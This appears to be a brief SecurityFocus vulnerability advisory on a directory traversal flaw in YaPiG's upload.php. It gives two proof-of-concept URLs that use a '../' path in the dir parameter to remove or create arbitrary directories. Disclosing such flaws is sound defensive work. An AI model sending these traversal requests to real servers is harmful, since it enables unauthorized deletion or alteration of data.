YaPiG Upload.PHP Directory Traversal Vulnerability

No exploit is required.

The following proof of concept URI are available:
Arbitrary Directory Removal:
http://www.example.com/upload.php?step=rmdir&dir=../folder

Arbitrary Directory Creation:
http://www.example.com/upload.php?step=mkdir&dir=../folder


 

Privacy Statement
Copyright 2010, SecurityFocus